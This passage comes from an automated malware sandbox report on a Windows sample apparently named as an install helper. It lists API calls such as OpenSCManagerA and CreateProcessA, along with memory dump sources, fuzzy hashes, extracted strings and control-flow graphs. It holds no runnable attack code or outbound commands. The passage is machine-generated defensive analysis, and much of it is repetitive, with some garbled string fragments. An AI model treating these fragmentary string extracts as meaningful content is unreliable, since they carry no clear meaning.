                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 3c38832d4c290676bb7b8cc67c4b0383b05c4859f304b8d777654b2266e4d7a2
                              • Instruction ID: 232cce74b09f3cb71c57677a8f240b6c661588b680b74d6b78dd4d78a5039e2f
                              • Opcode Fuzzy Hash: 3c38832d4c290676bb7b8cc67c4b0383b05c4859f304b8d777654b2266e4d7a2
                              • Instruction Fuzzy Hash: 0F2124701187018BC324CF75C8A07D6B7B6AF46308F994A5DC0A68BEC0DB74B4198B52
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C2E5130
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: 87383394ac6b539d3324ccc5873fb50e1bd37a32a6be47c52a6eeb23d19d1c87
                              • Instruction ID: 8648987c2800d13c8c0fdc9d8c38314a3c3f7a3d1df95f0c361e3698b78a0870
                              • Opcode Fuzzy Hash: 87383394ac6b539d3324ccc5873fb50e1bd37a32a6be47c52a6eeb23d19d1c87
                              • Instruction Fuzzy Hash: 56312AB4618346EFC7108F69C544B0ABBF0EB8D755F90896EF888DA360C375C9459B53
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C2DAEDC
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 76d2b6d01244d654a18003e62736a3d2aa38b31892ff6994f10ec251023037ea
                              • Instruction ID: 7052b335ba57873911ac5dc31659454118f13f00eeeb192ac39822b2ab22b085
                              • Opcode Fuzzy Hash: 76d2b6d01244d654a18003e62736a3d2aa38b31892ff6994f10ec251023037ea
                              • Instruction Fuzzy Hash: A81166B0508345EFD7108B28D44480EBBE4BF9A315F598E99F8A8CB690D331EC848B63
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C2BABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 12d7202b4727147c402ba53e0fbde5016b20af32d4d47d581c95553a545b9b08
                              • Instruction ID: f5fc2618151c7dee6e76f54f4e30bbcaee803612c2c396c0aa2bdf947916e303
                              • Opcode Fuzzy Hash: 12d7202b4727147c402ba53e0fbde5016b20af32d4d47d581c95553a545b9b08
                              • Instruction Fuzzy Hash: B762497060D38ACFC724CF18C490A5ABBE2ABD9349F148D1EF9A9DB751D734D8458B42

                               Control-flow Graph (legend: Executed / Not Executed)
                               control_flow_graph 6824 6c2fcad3-6c2fcae3 6825 6c2fcafd-6c2fcaff 6824->6825 6826 6c2fcae5-6c2fcaf8 call 6c2ef9df call 6c2ef9cc 6824->6826 6828 6c2fcb05-6c2fcb0b 6825->6828 6829 6c2fce64-6c2fce71 call 6c2ef9df call 6c2ef9cc 6825->6829 6840 6c2fce7c 6826->6840 6828->6829 6832 6c2fcb11-6c2fcb37 6828->6832 6847 6c2fce77 call 6c2f0120 6829->6847 6832->6829 6835 6c2fcb3d-6c2fcb46 6832->6835 6838 6c2fcb48-6c2fcb5b call 6c2ef9df call 6c2ef9cc 6835->6838 6839 6c2fcb60-6c2fcb62 6835->6839 6838->6847 6843 6c2fcb68-6c2fcb6b 6839->6843 6844 6c2fce60-6c2fce62 6839->6844 6846 6c2fce7f-6c2fce82 6840->6846 6843->6844 6845 6c2fcb71-6c2fcb75 6843->6845 6844->6846 6845->6838 6849 6c2fcb77-6c2fcb8e 6845->6849 6847->6840 6852 6c2fcbdf-6c2fcbe5 6849->6852 6853 6c2fcb90-6c2fcb93 6849->6853 6857 6c2fcbab-6c2fcbc2 call 6c2ef9df call 6c2ef9cc call 6c2f0120 6852->6857 6858 6c2fcbe7-6c2fcbf1 6852->6858 6855 6c2fcb95-6c2fcb9e 6853->6855 6856 6c2fcba3-6c2fcba9 6853->6856 6859 6c2fcc63-6c2fcc73 6855->6859 6856->6857 6860 6c2fcbc7-6c2fcbda 6856->6860 6890 6c2fcd97 6857->6890 6862 6c2fcbf8-6c2fcc16 call 6c2f47f5 call 6c2f47bb * 2 6858->6862 6863 6c2fcbf3-6c2fcbf5 6858->6863 6864 6c2fcc79-6c2fcc85 6859->6864 6865 6c2fcd38-6c2fcd41 call 6c3019e5 6859->6865 6860->6859 6894 6c2fcc18-6c2fcc2e call 6c2ef9cc call 6c2ef9df 6862->6894 6895 6c2fcc33-6c2fcc5c call 6c2fac69 6862->6895 6863->6862 6864->6865 6868 6c2fcc8b-6c2fcc8d 6864->6868 6879 6c2fcdb4 6865->6879 6880 6c2fcd43-6c2fcd55 6865->6880 6868->6865 6872 6c2fcc93-6c2fccb7 6868->6872 6872->6865 6876 6c2fccb9-6c2fcccf 6872->6876 6876->6865 6881 6c2fccd1-6c2fccd3 6876->6881 6883 6c2fcdb8-6c2fcdd0 ReadFile 6879->6883 6880->6879 6885 6c2fcd57-6c2fcd66 GetConsoleMode 6880->6885 6881->6865 6886 6c2fccd5-6c2fccfb 6881->6886 6888 6c2fce2c-6c2fce37 GetLastError 6883->6888 6889 6c2fcdd2-6c2fcdd8 6883->6889 6885->6879 6891 6c2fcd68-6c2fcd6c 6885->6891 6886->6865 6893 6c2fccfd-6c2fcd13 6886->6893 6896 6c2fce39-6c2fce4b call 6c2ef9cc call 6c2ef9df 6888->6896 6897 6c2fce50-6c2fce53 6888->6897 6889->6888 6898 6c2fcdda 6889->6898 6892 6c2fcd9a-6c2fcda4 call 6c2f47bb 6890->6892 6891->6883 6899 6c2fcd6e-6c2fcd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6905 6c2fcd15-6c2fcd17 6893->6905 6894->6890 6895->6859 6896->6890 6902 6c2fce59-6c2fce5b 6897->6902 6903 6c2fcd90-6c2fcd96 call 6c2ef9f2 6897->6903 6909 6c2fcddd-6c2fcdef 6898->6909 6900 6c2fcd8a GetLastError 6899->6900 6901 6c2fcda9-6c2fcdb2 6899->6901 6900->6903 6901->6909 6902->6892 6903->6890 6905->6865 6912 6c2fcd19-6c2fcd33 6905->6912 6909->6892 6916 6c2fcdf1-6c2fcdf5 6909->6916 6912->6865 6920 6c2fce0e-6c2fce19 6916->6920 6921 6c2fcdf7-6c2fce07 call 6c2fcefe 6916->6921 6923 6c2fce1b call 6c2fce83 6920->6923 6924 6c2fce25-6c2fce2a call 6c2fd1b6 6920->6924 6930 6c2fce0a-6c2fce0c 6921->6930 6931 6c2fce20-6c2fce23 6923->6931 6924->6931 6930->6892 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: be9c7c382f23c660fdb4b82a6bce29cad9593f21afd80cedae731e6c2862718d
                              • Instruction ID: 8a5534c41e32347e9317a55bbf8ecfc0cd4c6cab2d30261347d07b32a432c0ae
                              • Opcode Fuzzy Hash: be9c7c382f23c660fdb4b82a6bce29cad9593f21afd80cedae731e6c2862718d
                              • Instruction Fuzzy Hash: F9C1F674A8424EAFDB11EF98C880BADFBB4AF4A718F544159EC60A7B41C7719906CB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c30406c (basic-block edge list not reproduced); API nodes: GetFileType, GetLastError, CloseHandle
                              APIs
                                • Part of subcall function 6C304457: CreateFileW.KERNEL32(00000000,00000000,?,6C304115,?,?,00000000,?,6C304115,00000000,0000000C), ref: 6C304474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C304180
                              • __dosmaperr.LIBCMT ref: 6C304187
                              • GetFileType.KERNEL32(00000000), ref: 6C304193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C30419D
                              • __dosmaperr.LIBCMT ref: 6C3041A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C3041C6
                              • CloseHandle.KERNEL32(6C2FB0D0), ref: 6C304313
                              • GetLastError.KERNEL32 ref: 6C304345
                              • __dosmaperr.LIBCMT ref: 6C30434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 43ab95dff804f07fb5a60af84e5b6d5fceed88855d8131defaca56876ddb48cc
                              • Instruction ID: afcf42d0e3cdb4b3c1460b9997906c008f0f094fda53d77262536da79aa19031
                              • Opcode Fuzzy Hash: 43ab95dff804f07fb5a60af84e5b6d5fceed88855d8131defaca56876ddb48cc
                              • Instruction Fuzzy Hash: 38A15733B041489FCF09CF68D8417EE7BB5AB1B328F18025DE851AB781CB369A16CB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2bc1e0 (basic-block edge list not reproduced); API nodes: WriteFile, ReadFile
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 120193f67989b48eb1e4817fcf13dd47753e3e1acea21a35299825fa796b5920
                              • Instruction ID: 33a2295ccf887c6d1d38deafe2e0ae27789d84e60d8ad860e23322ea66f0126a
                              • Opcode Fuzzy Hash: 120193f67989b48eb1e4817fcf13dd47753e3e1acea21a35299825fa796b5920
                              • Instruction Fuzzy Hash: 52717EB020834AAFD710DF54C480B5ABBF4FF8AB48F10492EF898E6651D771D9489B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: ad46d0d7584c376d0ef9c78473fe7620f2a97e0e36bfdd9f2cfdacd8d42ec5da
                              • Instruction ID: 2503a468e580a6502598d739bb5c53590b4e81bd11992fd2ddd53359c0dbb6ec
                              • Opcode Fuzzy Hash: ad46d0d7584c376d0ef9c78473fe7620f2a97e0e36bfdd9f2cfdacd8d42ec5da
                              • Instruction Fuzzy Hash: 3D42887561934A8FC754CF18C4C0A1ABBE1AFCA399F248D1EF9A5A7B20D634D845CB43
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 057b8c9312e60da379b6dd1a57eeb008a81fa6a82ce10850077db7f6e72e910e
                              • Instruction ID: bfbba51b359a80ef13f12e2c684cc0dfe47060e8a2a64d1f46f25d045616e5f9
                              • Opcode Fuzzy Hash: 057b8c9312e60da379b6dd1a57eeb008a81fa6a82ce10850077db7f6e72e910e
                              • Instruction Fuzzy Hash: EB03D431645B018FC738CF29C8D0696B7E3AFD532471ACB6DC0A64BA95DB78B44ACB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2e4ff0 (basic-block edge list not reproduced); API nodes: CreateProcessA, WaitForSingleObject, CloseHandle
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: 246aa31c6d4cd7852e40f53c98867fd02e3fd4388b8dbdead8f1dd50acd6f4fa
                              • Instruction ID: d11a0c809b41a8f56023c63d5fe7f2e52d8b58f21b36ddb4ee6edda56f2494d1
                              • Opcode Fuzzy Hash: 246aa31c6d4cd7852e40f53c98867fd02e3fd4388b8dbdead8f1dd50acd6f4fa
                              • Instruction Fuzzy Hash: 713102708193808FD750DF29C198B6ABBF0EB8E318F405A1EF8D996250E7749588CF43

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2fbc5e (basic-block edge list not reproduced); API nodes: WriteFile, GetLastError
                              APIs
                                • Part of subcall function 6C2FBEB1: GetConsoleCP.KERNEL32(?,6C2FB0D0,?), ref: 6C2FBEF9
                              • WriteFile.KERNEL32(?,?,6C3046EC,00000000,00000000,?,00000000,00000000,6C305AB6,00000000,00000000,?,00000000,6C2FB0D0,6C3046EC,00000000), ref: 6C2FBDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000,?,?,?,?,00000000,?), ref: 6C2FBDB9
                              • __dosmaperr.LIBCMT ref: 6C2FBDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 6c0202d9991ba93421b471cd687a406639ae9e33ea1e4ac035c7ca4745908f2a
                              • Instruction ID: ae39628355321c34c121ba4c97026536267193a629dfd17de58a64690295ef6b
                              • Opcode Fuzzy Hash: 6c0202d9991ba93421b471cd687a406639ae9e33ea1e4ac035c7ca4745908f2a
                              • Instruction Fuzzy Hash: A551C575A8020EAFDB01DFA8C840FEFFB79EF0A359F540451ED20A7A51D770994687A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2e5b90 (basic-block edge list not reproduced); no Win32 API nodes, internal calls only
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: f67d5e8eb4b985f96fd1bc4365d48cea272dd001ff5b6367efbae5b13d4d5fd5
                              • Instruction ID: 234ad5fbefcc68e04253ec601c5841c0d51551bd95eab5af54b54144f073b569
                              • Opcode Fuzzy Hash: f67d5e8eb4b985f96fd1bc4365d48cea272dd001ff5b6367efbae5b13d4d5fd5
                              • Instruction Fuzzy Hash: 575153B5A00B048FD729CF29C481B97BBF1BB48318F408A2DD8865BB90D775B909CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2fb925 (basic-block edge list not reproduced); API nodes: CloseHandle, GetLastError
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C30425F), ref: 6C2FB97B
                              • GetLastError.KERNEL32(?,00000000,?,6C30425F), ref: 6C2FB985
                              • __dosmaperr.LIBCMT ref: 6C2FB9B0
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 52f9badbf6fd36f2b9b7cf64ed6abc6373cc353fc12cfabef69fb9264a05a0ee
                              • Instruction ID: 71f6148db0aa2551ec0601323c25480708c06786d772ee607d45d5039b8af92f
                              • Opcode Fuzzy Hash: 52f9badbf6fd36f2b9b7cf64ed6abc6373cc353fc12cfabef69fb9264a05a0ee
                              • Instruction Fuzzy Hash: 01012B33B8512C1AC600963A9845BADB7AD4F83B3DF694359FC758BEC0DB60C94A8A51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph of the function at 6c2f0b9c (basic-block edge list not reproduced); no Win32 API nodes, internal calls only
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 77259721ce02a57df4a445b37c6eaebd4517e31056985ca5e806794fb54ef5c1
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: A4F0DC725C175C6AD6211A2A8D00BCBB2A89F8237DF200715ECB497ED0DB70940B8BA1
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5AF4
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 70b5295480f5560892d8f5bbb5c7fc1aa51f7b99e9a5de71776775192dab0c49
                              • Instruction ID: 0cbf3cb803980b2295660e76fbf06dfce17ecd9060bf589fe2e40916fa5f826f
                              • Opcode Fuzzy Hash: 70b5295480f5560892d8f5bbb5c7fc1aa51f7b99e9a5de71776775192dab0c49
                              • Instruction Fuzzy Hash: B9514875211B04DBE725CF25C484BD6BBE4BB08718F448A1CE9AA5BB91DB30F549CB80
                              APIs
                              • GetLastError.KERNEL32(6C316DD8,0000000C), ref: 6C2EEF52
                              • ExitThread.KERNEL32 ref: 6C2EEF59
                              Memory Dump Source
